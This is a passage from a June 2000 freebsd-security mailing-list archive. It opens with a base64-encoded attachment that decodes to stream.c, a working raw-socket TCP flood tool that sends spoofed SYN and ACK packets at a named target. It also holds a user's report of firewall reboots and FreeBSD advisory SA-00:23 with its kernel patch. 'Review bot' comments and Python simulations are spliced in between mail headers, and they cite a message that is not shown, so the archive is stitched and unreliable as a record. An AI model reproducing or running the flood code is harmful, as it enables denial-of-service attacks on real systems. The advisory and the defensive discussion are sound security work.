ICAgICAgICAgICAgLyogdmFsdWUgKi8NCn07DQoNCnN0cnVjdCBwc2V1ZG9faGRyIHsgICAgICAg 
ICAgICAgICAgICAgICAvKiBTZWUgUkZDIDc5MyBQc2V1ZG8gSGVhZGVyICovDQogICAgdV9sb25n IHNhZGRyLCBkYWRkcjsgICAgICAgICAgICAgICAgICAgICAgICAvKiBzb3VyY2UgYW5kIGRlc3Qg YWRkcmVzcyAqLw0KICAgIHVfY2hhciBtYnosIHB0Y2w7ICAgICAgICAgICAgICAgICAgIC8qIHpl cm8gYW5kIHByb3RvY29sICovDQogICAgdV9zaG9ydCB0Y3BsOyAgICAgICAgICAgICAgICAgICAg ICAgLyogdGNwIGxlbmd0aCAqLw0KfTsNCg0Kc3RydWN0IHBhY2tldCB7DQogICAgc3RydWN0IGlw LypfaGRyKi8gaXA7DQogICAgc3RydWN0IHRjcGhkciB0Y3A7DQovKiBzdHJ1Y3QgdGNwb3B0X2hk ciBvcHQ7ICovDQp9Ow0KDQpzdHJ1Y3QgY2tzdW0gew0KICAgIHN0cnVjdCBwc2V1ZG9faGRyIHBz ZXVkbzsNCiAgICBzdHJ1Y3QgdGNwaGRyIHRjcDsNCn07DQoNCnN0cnVjdCBwYWNrZXQgcGFja2V0 Ow0Kc3RydWN0IGNrc3VtIGNrc3VtOw0Kc3RydWN0IHNvY2thZGRyX2luIHNfaW47DQp1X3Nob3J0 IGRzdHBvcnQsIHBrdHNpemUsIHBwczsNCnVfbG9uZyBkc3RhZGRyOw0KaW50IHNvY2s7DQoNCnZv aWQgdXNhZ2UoY2hhciAqcHJvZ25hbWUpDQp7DQogICAgZnByaW50ZihzdGRlcnIsICJVc2FnZTog JXMgPGRzdGFkZHI+IDxkc3Rwb3J0PiA8cGt0c2l6ZT4gPHBwcz5cbiIsIA0KcHJvZ25hbWUpOw0K ICAgIGZwcmludGYoc3RkZXJyLCAiICAgIGRzdGFkZHIgIC0gdGhlIHRhcmdldCB3ZSBhcmUgdHJ5 aW5nIHRvIGF0dGFjay5cbiIpOw0KICAgIGZwcmludGYoc3RkZXJyLCAiICAgIGRzdHBvcnQgIC0g dGhlIHBvcnQgb2YgdGhlIHRhcmdldCwgMCA9IHJhbmRvbS5cbiIpOw0KICAgIGZwcmludGYoc3Rk ZXJyLCAiICAgIHBrdHNpemUgIC0gdGhlIGV4dHJhIHNpemUgdG8gdXNlLiAgMCA9IG5vcm1hbCAN CnN5bi5cbiIpOw0KICAgIGV4aXQoMSk7DQp9DQoNCi8qIFRoaXMgaXMgYSByZWZlcmVuY2UgaW50 ZXJuZXQgY2hlY2tzdW0gaW1wbGltZW50YXRpb24sIG5vdCB2ZXJ5IGZhc3QgKi8NCmlubGluZSB1 X3Nob3J0IGluX2Nrc3VtKHVfc2hvcnQgKmFkZHIsIGludCBsZW4pDQp7DQogICAgcmVnaXN0ZXIg aW50IG5sZWZ0ID0gbGVuOw0KICAgIHJlZ2lzdGVyIHVfc2hvcnQgKncgPSBhZGRyOw0KICAgIHJl Z2lzdGVyIGludCBzdW0gPSAwOw0KICAgIHVfc2hvcnQgYW5zd2VyID0gMDsNCg0KICAgICAvKiBP dXIgYWxnb3JpdGhtIGlzIHNpbXBsZSwgdXNpbmcgYSAzMiBiaXQgYWNjdW11bGF0b3IgKHN1bSks IHdlIGFkZA0KICAgICAgKiBzZXF1ZW50aWFsIDE2IGJpdCB3b3JkcyB0byBpdCwgYW5kIGF0IHRo ZSBlbmQsIGZvbGQgYmFjayBhbGwgdGhlDQogICAgICAqIGNhcnJ5IGJpdHMgZnJvbSB0aGUgdG9w IDE2IGJpdHMgaW50byB0aGUgbG93ZXIgMTYgYml0cy4gKi8NCg0KICAgICB3aGlsZSAobmxlZnQg 
PiAxKSAgew0KICAgICAgICAgc3VtICs9ICp3Kys7DQogICAgICAgICBubGVmdCAtPSAyOw0KICAg ICB9DQoNCiAgICAgLyogbW9wIHVwIGFuIG9kZCBieXRlLCBpZiBuZWNlc3NhcnkgKi8NCiAgICAg aWYgKG5sZWZ0ID09IDEpIHsNCiAgICAgICAgICoodV9jaGFyICopKCZhbnN3ZXIpID0gKih1X2No YXIgKikgdzsNCiAgICAgICAgIHN1bSArPSBhbnN3ZXI7DQogICAgIH0NCg0KICAgICAvKiBhZGQg YmFjayBjYXJyeSBvdXRzIGZyb20gdG9wIDE2IGJpdHMgdG8gbG93IDE2IGJpdHMgKi8NCiAgICAg c3VtID0gKHN1bSA+PiAxNikgKyAoc3VtICYgMHhmZmZmKTsgLyogYWRkIGhpIDE2IHRvIGxvdyAx NiAqLw0KICAgICBzdW0gKz0gKHN1bSA+PiAxNik7ICAgICAgICAgICAgICAgIC8qIGFkZCBjYXJy eSAqLw0KICAgICBhbnN3ZXIgPSB+c3VtOyAgICAgICAgICAgICAgICAgICAgIC8qIHRydW5jYXRl IHRvIDE2IGJpdHMgKi8NCiAgICAgcmV0dXJuKGFuc3dlcik7DQp9DQoNCnVfbG9uZyBsb29rdXAo Y2hhciAqaG9zdG5hbWUpDQp7DQogICAgc3RydWN0IGhvc3RlbnQgKmhwOw0KDQogICAgaWYgKCho cCA9IGdldGhvc3RieW5hbWUoaG9zdG5hbWUpKSA9PSBOVUxMKSB7DQogICAgICAgZnByaW50Zihz dGRlcnIsICJDb3VsZCBub3QgcmVzb2x2ZSAlcy5cbiIsIGhvc3RuYW1lKTsNCiAgICAgICBleGl0 KDEpOw0KICAgIH0NCg0KICAgIHJldHVybiAqKHVfbG9uZyAqKWhwLT5oX2FkZHI7DQp9DQoNCg0K dm9pZCBmbG9vZGVyKHZvaWQpDQp7DQogICAgc3RydWN0IHRpbWVzcGVjIHRzOw0KICAgIGludCBp Ow0KDQoNCiAgICBtZW1zZXQoJnBhY2tldCwgMCwgc2l6ZW9mKHBhY2tldCkpOw0KDQogICAgdHMu dHZfc2VjICAgICAgICAgICAgICAgICAgID0gMDsNCiAgICB0cy50dl9uc2VjICAgICAgICAgICAg ICAgICAgPSAxMDsNCg0KICAgIHBhY2tldC5pcC5pcF9obCAgICAgICAgICAgICA9IDU7DQogICAg cGFja2V0LmlwLmlwX3YgICAgICAgICAgICAgID0gNDsNCiAgICBwYWNrZXQuaXAuaXBfcCAgICAg ICAgICAgICAgPSBJUFBST1RPX1RDUDsNCiAgICBwYWNrZXQuaXAuaXBfdG9zICAgICAgICAgICAg PSAweDA4Ow0KICAgIHBhY2tldC5pcC5pcF9pZCAgICAgICAgICAgICA9IHJhbmQoKTsNCiAgICBw YWNrZXQuaXAuaXBfbGVuICAgICAgICAgICAgPSBGSVgoc2l6ZW9mKHBhY2tldCkpOw0KICAgIHBh Y2tldC5pcC5pcF9vZmYgICAgICAgICAgICA9IDA7IC8qIElQX0RGPyAqLw0KICAgIHBhY2tldC5p cC5pcF90dGwgICAgICAgICAgICA9IDI1NTsNCiAgICBwYWNrZXQuaXAuaXBfZHN0LnNfYWRkciAg ICAgPSByYW5kb20oKTsNCg0KICAgIHBhY2tldC50Y3AudGhfZmxhZ3MgICAgICAgICA9IDA7DQog ICAgcGFja2V0LnRjcC50aF93aW4gICAgICAgICAgID0gaHRvbnMoMTYzODQpOw0KICAgIHBhY2tl 
dC50Y3AudGhfc2VxICAgICAgICAgICA9IHJhbmRvbSgpOw0KICAgIHBhY2tldC50Y3AudGhfYWNr ICAgICAgICAgICA9IDA7DQogICAgcGFja2V0LnRjcC50aF9vZmYgICAgICAgICAgID0gNTsgLyog NSAqLw0KICAgIHBhY2tldC50Y3AudGhfdXJwICAgICAgICAgICA9IDA7DQogICAgcGFja2V0LnRj cC50aF9kcG9ydCAgICAgICAgID0gZHN0cG9ydD9odG9ucyhkc3Rwb3J0KTpyYW5kKCk7DQoNCi8q DQogICAgcGFja2V0Lm9wdC50eXBlICAgICAgICAgICAgID0gMHgwMjsNCiAgICBwYWNrZXQub3B0 LmxlbiAgICAgICAgICAgICAgPSAweDA0Ow0KICAgIHBhY2tldC5vcHQudmFsdWUgICAgICAgICAg ICA9IGh0b25zKDE0NjApOw0KKi8NCg0KDQogICAgY2tzdW0ucHNldWRvLmRhZGRyICAgICAgICAg ID0gZHN0YWRkcjsNCiAgICBja3N1bS5wc2V1ZG8ubWJ6ICAgICAgICAgICAgPSAwOw0KICAgIGNr c3VtLnBzZXVkby5wdGNsICAgICAgICAgICA9IElQUFJPVE9fVENQOw0KICAgIGNrc3VtLnBzZXVk by50Y3BsICAgICAgICAgICA9IGh0b25zKHNpemVvZihzdHJ1Y3QgdGNwaGRyKSk7DQoNCiAgICBz X2luLnNpbl9mYW1pbHkgICAgICAgICAgICAgPSBBRl9JTkVUOw0KICAgIHNfaW4uc2luX2FkZHIu c19hZGRyICAgICAgICAgICAgICAgID0gZHN0YWRkcjsNCiAgICBzX2luLnNpbl9wb3J0ICAgICAg ICAgICAgICAgPSBwYWNrZXQudGNwLnRoX2Rwb3J0Ow0KDQogICAgZm9yKGk9MDs7KytpKSB7DQov KiANCglwYXRjaGVkIGJ5IDNBUEEzQSB0byBzZW5kIDEgc3luIHBhY2tldCArIDEwMjMgQUNLIHBh Y2tldHMuIA0KDQoqLw0KICAgIGlmKCAhKGkmMHgzRkYpICkgew0KCXBhY2tldC50Y3AudGhfc3Bv cnQgPSByYW5kKCk7DQoJY2tzdW0ucHNldWRvLnNhZGRyID0gcGFja2V0LmlwLmlwX3NyYy5zX2Fk ZHIgPSByYW5kb20oKTsNCglwYWNrZXQudGNwLnRoX2ZsYWdzID0gVEhfU1lOOw0KICAgICAgICBw YWNrZXQudGNwLnRoX2FjayAgICAgICAgICAgPSAwOw0KDQogICAgfQ0KICAgIGVsc2Ugew0KCXBh Y2tldC50Y3AudGhfZmxhZ3MgPSBUSF9BQ0s7DQoJcGFja2V0LnRjcC50aF9hY2sgPSByYW5kKCk7 DQogICAgfQ0KDQoNCiAgICAvKiBja3N1bS5wc2V1ZG8uc2FkZHIgPSBwYWNrZXQuaXAuaXBfc3Jj LnNfYWRkciA9IHJhbmRvbSgpOyAqLw0KICAgICAgICsrcGFja2V0LmlwLmlwX2lkOw0KICAgICAg IC8qKytwYWNrZXQudGNwLnRoX3Nwb3J0Ki87DQogICAgICAgKytwYWNrZXQudGNwLnRoX3NlcTsN Cg0KICAgICAgIGlmICghZHN0cG9ydCkNCiAgICAgICAgICBzX2luLnNpbl9wb3J0ID0gcGFja2V0 LnRjcC50aF9kcG9ydCA9IHJhbmQoKTsNCg0KICAgICAgIHBhY2tldC5pcC5pcF9zdW0gICAgICAg ICA9IDA7DQogICAgICAgcGFja2V0LnRjcC50aF9zdW0gICAgICAgICAgICAgICAgPSAwOw0KDQog 
ICAgICAgY2tzdW0udGNwICAgICAgICAgICAgICAgICAgICAgICAgPSBwYWNrZXQudGNwOw0KDQog ICAgICAgcGFja2V0LmlwLmlwX3N1bSAgICAgICAgID0gaW5fY2tzdW0oKHZvaWQgKikmcGFja2V0 LmlwLCAyMCk7DQogICAgICAgcGFja2V0LnRjcC50aF9zdW0gICAgICAgICAgICAgICAgPSBpbl9j a3N1bSgodm9pZCAqKSZja3N1bSwgc2l6ZW9mKGNrc3VtKSk7DQoNCiAgICAgICBpZiAoc2VuZHRv KHNvY2ssICZwYWNrZXQsIHNpemVvZihwYWNrZXQpLCAwLCAoc3RydWN0IHNvY2thZGRyIA0KKikm c19pbiwgc2l6ZW9mKHNfaW4pKSA8IDApDQogICAgICAgICAgcGVycm9yKCJqZXNzIik7DQoNCiAg ICB9DQp9DQoNCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogICAgaW50IG9u ID0gMTsNCg0KICAgIHByaW50Zigic3RyZWFtLmMgdjEuMDEgLSBUQ1AgUGFja2V0IFN0b3JtXG4i KTsNCg0KICAgIGlmICgoc29jayA9IHNvY2tldChQRl9JTkVULCBTT0NLX1JBVywgSVBQUk9UT19S QVcpKSA8IDApIHsNCiAgICAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgICAgIGV4aXQoMSk7DQog ICAgfQ0KDQogICAgc2V0Z2lkKGdldGdpZCgpKTsgc2V0dWlkKGdldHVpZCgpKTsNCg0KICAgIGlm IChhcmdjIDwgNCkNCiAgICAgICB1c2FnZShhcmd2WzBdKTsNCg0KICAgIGlmIChzZXRzb2Nrb3B0 KHNvY2ssIElQUFJPVE9fSVAsIElQX0hEUklOQ0wsIChjaGFyICopJm9uLCBzaXplb2Yob24pKSA8 IA0KMCkgew0KICAgICAgIHBlcnJvcigic2V0c29ja29wdCIpOw0KICAgICAgIGV4aXQoMSk7DQog ICAgfQ0KDQogICAgc3JhbmQoKHRpbWUoTlVMTCkgXiBnZXRwaWQoKSkgKyBnZXRwcGlkKCkpOw0K DQogICAgcHJpbnRmKCJcblJlc29sdmluZyBJUHMuLi4iKTsgZmZsdXNoKHN0ZG91dCk7DQoNCiAg ICBkc3RhZGRyICAgICA9IGxvb2t1cChhcmd2WzFdKTsNCiAgICBkc3Rwb3J0ICAgICA9IGF0b2ko YXJndlsyXSk7DQogICAgcGt0c2l6ZSAgICAgPSBhdG9pKGFyZ3ZbM10pOw0KDQogICAgcHJpbnRm KCJTZW5kaW5nLi4uIik7IGZmbHVzaChzdGRvdXQpOw0KDQogICAgZmxvb2RlcigpOw0KDQogICAg cmV0dXJuIDA7DQp9DQo= ------------4B7E20EB2F02F8-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 22 3:33:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from gateway.bangsplat.org (h00e02962237e.ne.mediaone.net [24.147.164.44]) by hub.freebsd.org (Postfix) with ESMTP id 0864B37C236 for ; Thu, 22 Jun 2000 03:33:06 -0700 (PDT) (envelope-from georgeh@bangsplat.org) Received: from pentium (unknown [192.168.1.3]) by 
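Vladimir Dubrovin's two ipfw measures in the forwarded message above (the tcpflags allow-list, and the dummynet pipe that admits 500 TCP packets per 50 ms) modelled in Python, as an added example that is not part of the original message, of ipfw or of dummynet. The flag masks follow ipfw's tcpflags semantics (a rule matches when every listed bit is set); the per-window packet counter models the limit as Vladimir states it, not dummynet's real queue mechanics; the addresses, packet sizes and arrival times are constructed. It shows why the first measure stops the published stream.c (th_flags = 0) but not the SYN + ACK variant, and what the second measure costs legitimate traffic during a flood.

```python
import random
from collections import namedtuple

# TCP flag bits as defined in <netinet/tcp.h>
TH_FIN, TH_SYN, TH_RST, TH_PUSH, TH_ACK = 0x01, 0x02, 0x04, 0x08, 0x10

# src: constructed address; size: bytes on the wire; t_ms: arrival time in the window
Packet = namedtuple("Packet", "src flags size t_ms")

# "allow tcp ... tcpflags ack / syn / syn,ack / rst ... deny tcp from any to any":
# each allow rule is a mask of bits that must all be set; anything else is denied.
ALLOW_RULES = [TH_ACK, TH_SYN, TH_SYN | TH_ACK, TH_RST]


def flags_filter(pkt):
    """True when some allow rule matches, False when the final deny applies."""
    return any(pkt.flags & need == need for need in ALLOW_RULES)


class WindowLimiter:
    """Admit at most `limit` packets per `window_ms`, drop the rest.

    Fixed-window counter standing in for "pipe 10 config delay 50 queue 500
    packets" as described in the message (assumption, not dummynet itself)."""

    def __init__(self, limit=500, window_ms=50):
        self.limit, self.window_ms = limit, window_ms
        self.window, self.count = -1, 0

    def admit(self, pkt):
        w = int(pkt.t_ms // self.window_ms)
        if w != self.window:            # new window: reset the counter
            self.window, self.count = w, 0
        if self.count >= self.limit:
            return False
        self.count += 1
        return True


def allowed_bandwidth_mbps(limit=500, window_ms=50, pkt_bytes=500):
    """Throughput the limit permits for packets of one size (the 40 Mbps / 4 Mbps figures)."""
    return limit * pkt_bytes * 8 * 1000 / window_ms / 1e6


def make_flood(rng, n, window_ms, pattern):
    """Constructed flood: 'none' = th_flags 0 like the published stream.c;
    'stream2' = one SYN then 1023 ACKs per spoofed source block."""
    pkts, src = [], None
    for i in range(n):
        if i % 1024 == 0:               # a fresh spoofed source per 1024-packet block
            src = "198.51.100.%d" % rng.randrange(1, 255)   # TEST-NET-2, constructed
        flags = 0 if pattern == "none" else (TH_SYN if i % 1024 == 0 else TH_ACK)
        pkts.append(Packet(src, flags, 40, rng.uniform(0, window_ms)))
    return pkts


def simulate(n_legit=200, n_flood=2000, limit=500, window_ms=50, seed=1):
    """One 50 ms window of legitimate mail traffic mixed with a flood."""
    rng = random.Random(seed)
    legit = [Packet("203.0.113.5", TH_ACK | TH_PUSH, 500, rng.uniform(0, window_ms))
             for _ in range(n_legit)]
    stream = make_flood(rng, n_flood, window_ms, "none")
    stream2 = make_flood(rng, n_flood, window_ms, "stream2")
    result = {
        "flags_passed_stream": sum(flags_filter(p) for p in stream),
        "flags_passed_stream2": sum(flags_filter(p) for p in stream2),
    }
    # the SYN + ACK flood passes the flag rules, so only the rate limit is left
    lim = WindowLimiter(limit, window_ms)
    admitted = [p for p in sorted(legit + stream2, key=lambda p: p.t_ms) if lim.admit(p)]
    result["admitted_total"] = len(admitted)
    result["admitted_legit"] = sum(p.src == "203.0.113.5" for p in admitted)
    result["admitted_flood"] = result["admitted_total"] - result["admitted_legit"]
    return result


if __name__ == "__main__":
    print(simulate())
    print("500-byte packets:", allowed_bandwidth_mbps(pkt_bytes=500), "Mbps")
    print("50-byte packets: ", allowed_bandwidth_mbps(pkt_bytes=50), "Mbps")
```

The simulation makes the trade-off in the message concrete: with 2000 flood packets and 200 legitimate ones in the window, only 500 are admitted and the legitimate share shrinks proportionally, which is the "connections can be dropped, but at least your host will be safe" outcome.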
gateway.bangsplat.org (Postfix) with SMTP id 965F4CC; Thu, 22 Jun 2000 06:33:02 -0400 (EDT)
Message-ID: <001301bfdc35$3dbff170$0301a8c0@pentium>
From: "George Hartz"
To: "Tim McCullagh" , "Christiaan Rademan" ,
References: <3951B6C8.DA609831@mics.co.za> <00eb01bfdc27$35e50520$778d25cb@halenet.com.au>
Subject: Re: Hi All.
Date: Thu, 22 Jun 2000 06:33:01 -0400
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

One of the systems I use as a firewall is running 4.0 as well, and is doing the same thing. It was on some hardware that I'd had some reliability problems with in the past (bad DIMM), but two days ago I replaced the DIMM, and was rather unhappy to discover yesterday that it's still doing it. I've actually seen it do it dozens of times, but never thought to make note of the error that popped up since I assumed it was a hardware problem. Compiling a custom kernel hasn't helped though.

I certainly see a lot of attempts at DOS attacks and port scans being on a cable modem, but there doesn't seem to be any relation between catching such a scan and the system doing a reboot.

According to the system it's been about five hours since it happened, which is longer than usual. It's usually about once an hour.

I'll post if I find anything, now that I know it may be more than just a hardware issue.

- George
From owner-freebsd-security Thu Jun 22 14:51:03 2000
Delivered-To: freebsd-security@freebsd.org
Received: by hub.freebsd.org (Postfix, from userid 758) id D642E37BF12; Thu, 22 Jun 2000 14:50:52 -0700 (PDT)
From: FreeBSD Security Advisories
Subject: FreeBSD Security Advisory: FreeBSD-SA-00:23.ip-options
Reply-To: security-advisories@freebsd.org
From: FreeBSD Security Advisories
Message-Id: <20000622215052.D642E37BF12@hub.freebsd.org>
Date: Thu, 22 Jun 2000 14:50:52 -0700 (PDT)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-00:23                                             Security Advisory
                                                                  FreeBSD, Inc.

Topic:          Remote denial-of-service in IP stack

Category:       core
Module:         kernel
Announced:      2000-06-19
Affects:        FreeBSD systems prior to the correction date
Credits:        NetBSD Security Advisory 2000-002, and Jun-ichiro itojun Hagino
Corrected:      (Several bugs fixed, the date below is that of the most recent fix)
                2000-06-08 (3.4-STABLE)
                2000-06-08 (4.0-STABLE)
                2000-06-02 (5.0-CURRENT)
FreeBSD only:   NO

I.   Background

II.  Problem Description

There are several bugs in the processing of IP options in the FreeBSD IP stack, which fail to correctly bounds-check arguments and contain other coding errors leading to the possibility of data corruption and a kernel panic upon reception of certain invalid IP packets. This set of bugs includes the instance of the vulnerability described in NetBSD Security Advisory 2000-002 (see ftp://ftp.NetBSD.ORG/pub/NetBSD/misc/security/advisories/NetBSD-SA2000-002.txt.asc) as well as other bugs with similar effect.

III. Impact

Remote users can cause a FreeBSD system to panic and reboot.

IV.  Workaround

None available.

V.   Solution

One of the following:

1) Upgrade your FreeBSD system to 3.4-STABLE, 4.0-STABLE or 5.0-CURRENT after the respective correction dates.

2) Apply the patch below and recompile your kernel.

Either save this advisory to a file, or download the patch and detached PGP signature from the following locations, and verify the signature using your PGP utility.
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:23/ip_options.diff ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:23/ip_options.diff.asc # cd /usr/src/sys/netinet # patch -p < /path/to/patch_or_advisory [ Recompile your kernel as described in http://www.freebsd.org/handbook/kernelconfig.html and reboot the system ] Index: ip_icmp.c =================================================================== RCS file: /ncvs/src/sys/netinet/ip_icmp.c,v retrieving revision 1.39 diff -u -r1.39 ip_icmp.c --- ip_icmp.c 2000/01/28 06:13:09 1.39 +++ ip_icmp.c 2000/06/08 15:26:39 @@ -662,8 +662,11 @@ if (opt == IPOPT_NOP) len = 1; else { + if (cnt < IPOPT_OLEN + sizeof(*cp)) + break; len = cp[IPOPT_OLEN]; - if (len <= 0 || len > cnt) + if (len < IPOPT_OLEN + sizeof(*cp) || + len > cnt) break; } /* Index: ip_input.c =================================================================== RCS file: /ncvs/src/sys/netinet/ip_input.c,v retrieving revision 1.130 diff -u -r1.130 ip_input.c --- ip_input.c 2000/02/23 20:11:57 1.130 +++ ip_input.c 2000/06/08 15:25:46 @@ -1067,8 +1067,12 @@ if (opt == IPOPT_NOP) optlen = 1; else { + if (cnt < IPOPT_OLEN + sizeof(*cp)) { + code = &cp[IPOPT_OLEN] - (u_char *)ip; + goto bad; + } optlen = cp[IPOPT_OLEN]; - if (optlen <= 0 || optlen > cnt) { + if (optlen < IPOPT_OLEN + sizeof(*cp) || optlen > cnt) { code = &cp[IPOPT_OLEN] - (u_char *)ip; goto bad; } @@ -1174,6 +1178,10 @@ break; case IPOPT_RR: + if (optlen < IPOPT_OFFSET + sizeof(*cp)) { + code = &cp[IPOPT_OFFSET] - (u_char *)ip; + goto bad; + } if ((off = cp[IPOPT_OFFSET]) < IPOPT_MINOFF) { code = &cp[IPOPT_OFFSET] - (u_char *)ip; goto bad; Index: ip_output.c =================================================================== RCS file: /ncvs/src/sys/netinet/ip_output.c,v retrieving revision 1.99 diff -u -r1.99 ip_output.c --- ip_output.c 2000/03/09 14:57:15 1.99 +++ ip_output.c 2000/06/08 15:27:08 
@@ -1302,8 +1302,10 @@ if (opt == IPOPT_NOP) optlen = 1; else { + if (cnt < IPOPT_OLEN + sizeof(*cp)) + goto bad; optlen = cp[IPOPT_OLEN]; - if (optlen <= IPOPT_OLEN || optlen > cnt) + if (optlen < IPOPT_OLEN + sizeof(*cp) || optlen > cnt) goto bad; } switch (opt) { -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBOU3tLFUuHi5z0oilAQGR8AP/UbWPEYtE9Z5UAlesutOSp6UcHnl+6Gga nglpEBloBsf81J53nkLbf02rWQedb1BhROL1i+df9J328sCF/Tpci04bmdSAtiox EwDim4AlTjn4PqjlHyX1jf1mi0sMgxSuI5bBPuiVfsdYRbd96+AEbftfR9BuyqbB m6dFcBN5+y0= =A1Fk -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 22 15: 8:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from testbed.baileylink.net (testbed.baileylink.net [63.71.213.24]) by hub.freebsd.org (Postfix) with ESMTP id 71FF737B6D3 for ; Thu, 22 Jun 2000 15:08:04 -0700 (PDT) (envelope-from brad@testbed.baileylink.net) Received: (from brad@localhost) by testbed.baileylink.net (8.9.3/8.9.3) id RAA12226 for freebsd-security@FreeBSD.ORG; Thu, 22 Jun 2000 17:08:31 -0500 (CDT) (envelope-from brad) Date: Thu, 22 Jun 2000 17:08:31 -0500 
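Review bot: the ip_icmp.c hunk leaves a malformed option with `break`, while the matching checks this same patch adds to ip_input.c and ip_output.c use `goto bad`; nothing in the diff explains the asymmetry, so a comment on the new `if (cnt < IPOPT_OLEN + sizeof(*cp)) break;` line stating why silently ending the option walk (rather than rejecting the packet) is the intended outcome in this file would spare the next reader a hunt.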
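Review bot: the second ip_input.c hunk (`@@ -1174,6 +1178,10 @@`) guards the read of cp[IPOPT_OFFSET] only in the `case IPOPT_RR:` arm; the other arms of that switch are outside the hunk, so this diff alone cannot confirm that every case which reads cp[IPOPT_OFFSET] gets the same `optlen < IPOPT_OFFSET + sizeof(*cp)` guard. Worth checking the remaining cases before applying.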
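Review bot: in the ip_output.c hunk the old test `optlen <= IPOPT_OLEN` already rejected option lengths 0 and 1, so rewriting it as `optlen < IPOPT_OLEN + sizeof(*cp)` is behaviourally the same (IPOPT_OLEN is 1 in netinet/ip.h and sizeof(*cp) is 1, so both reject optlen below 2); the substantive fix in this hunk is the new `if (cnt < IPOPT_OLEN + sizeof(*cp)) goto bad;`, which stops cp[IPOPT_OLEN] being read past the end of the option block. A one-line comment saying so would keep readers from looking for a behavioural change in the second condition.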
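The bounds checks the ip_input.c hunks above add, modelled in Python as an added example that is not code from the advisory or from the FreeBSD kernel: a walker over an IPv4 option block that can run either with the pre-patch test (`optlen <= 0 || optlen > cnt`) or with the patched tests, over constructed option blocks. The constants carry their netinet/ip.h values (IPOPT_OLEN 1, IPOPT_OFFSET 2, IPOPT_MINOFF 4); the OutOfBounds exception is an assumption standing in for the kernel reading past the option block, and the sample blocks are constructed, not captured from any packet.

```python
# Constants from <netinet/ip.h>
IPOPT_EOL, IPOPT_NOP, IPOPT_RR = 0, 1, 7
IPOPT_OLEN = 1        # position of the length byte within an option
IPOPT_OFFSET = 2      # position of the pointer byte (record route)
IPOPT_MINOFF = 4      # smallest legal pointer value


class BadOption(ValueError):
    """Where the kernel does 'goto bad': the packet is dropped."""


class OutOfBounds(IndexError):
    """Assumption: stands in for the pre-patch kernel reading past the block."""


def _byte(buf, idx):
    """Bounds-checked read so an overread is reported instead of silently happening."""
    if idx >= len(buf):
        raise OutOfBounds(idx)
    return buf[idx]


def parse_options(opts: bytes, hardened: bool = True):
    """Walk an IPv4 option block and return (type, length) pairs.

    hardened=True applies the checks SA-00:23 adds to ip_input.c;
    hardened=False keeps only the pre-patch length test, so a truncated
    option makes the walk read past the end of the block."""
    found = []
    i, cnt = 0, len(opts)
    while cnt > 0:
        opt = opts[i]
        if opt == IPOPT_EOL:
            break
        if opt == IPOPT_NOP:
            optlen = 1
        else:
            # added check: a type byte with no length byte behind it is rejected
            if hardened and cnt < IPOPT_OLEN + 1:
                raise BadOption("option truncated before its length byte")
            optlen = _byte(opts, i + IPOPT_OLEN)
            # pre-patch: optlen <= 0; patched: optlen < IPOPT_OLEN + sizeof(*cp)
            minimum = IPOPT_OLEN + 1 if hardened else 1
            if optlen < minimum or optlen > cnt:
                raise BadOption("bad option length %d" % optlen)
        if opt == IPOPT_RR:
            # added check: the pointer byte must lie inside the option
            if hardened and optlen < IPOPT_OFFSET + 1:
                raise BadOption("record route option too short for a pointer")
            off = _byte(opts, i + IPOPT_OFFSET)
            if off < IPOPT_MINOFF:
                raise BadOption("record route pointer %d below IPOPT_MINOFF" % off)
        found.append((opt, optlen))
        i += optlen
        cnt -= optlen
    return found


def verdict(opts, hardened=True):
    """'ok', 'bad' (packet dropped) or 'overread' (pre-patch out-of-bounds read)."""
    try:
        parse_options(opts, hardened)
        return "ok"
    except BadOption:
        return "bad"
    except OutOfBounds:
        return "overread"


# Constructed option blocks (not taken from any captured packet)
GOOD = bytes([IPOPT_NOP, IPOPT_NOP, IPOPT_RR, 7, 4, 0, 0, 0, 0, IPOPT_EOL])
NO_LENGTH_BYTE = bytes([IPOPT_RR])          # type byte only
RR_NO_POINTER = bytes([IPOPT_RR, 2])        # length 2: no room for the pointer byte
RR_BAD_POINTER = bytes([IPOPT_RR, 3, 2])    # pointer 2 is below IPOPT_MINOFF

if __name__ == "__main__":
    for name, blk in [("GOOD", GOOD), ("NO_LENGTH_BYTE", NO_LENGTH_BYTE),
                      ("RR_NO_POINTER", RR_NO_POINTER), ("RR_BAD_POINTER", RR_BAD_POINTER)]:
        print("%-15s pre-patch: %-9s patched: %s"
              % (name, verdict(blk, False), verdict(blk)))
```

Running the pre-patch path over NO_LENGTH_BYTE and RR_NO_POINTER shows the two reads the patch prevents (the length byte and the pointer byte fetched from beyond the option block); the patched path turns both into a rejected packet.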
From: Brad Guillory
To: freebsd-security@FreeBSD.ORG
Subject: Re: How defend from stream2.c attack?
Message-ID: <20000622170831.B9875@baileylink.net>
Mail-Followup-To: freebsd-security@FreeBSD.ORG
References: <000401bfdb64$3eae8320$0c3214d4@dragonland.tts.tomsk.su> <4.3.2.7.2.20000621125756.048b6d80@localhost> <200006220015.RAA05962@salsa.gv.tsc.tdk.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2i
In-Reply-To: <200006220015.RAA05962@salsa.gv.tsc.tdk.com>; from Don.Lewis@tsc.tdk.com on Wed, Jun 21, 2000 at 05:15:46PM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

